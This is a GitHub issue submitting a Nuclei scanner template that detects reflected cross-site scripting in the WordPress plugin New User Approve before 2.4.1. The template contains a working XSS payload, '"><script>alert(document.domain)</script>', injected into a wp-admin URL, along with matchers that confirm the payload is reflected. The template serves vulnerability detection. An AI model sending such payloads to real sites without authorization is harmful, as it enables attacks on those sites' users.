### ISSUE TITLE
New User Approve < 2.4.1 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4644]
```yaml
id: new-user-approve-xss

info:
  name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/index.php?a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
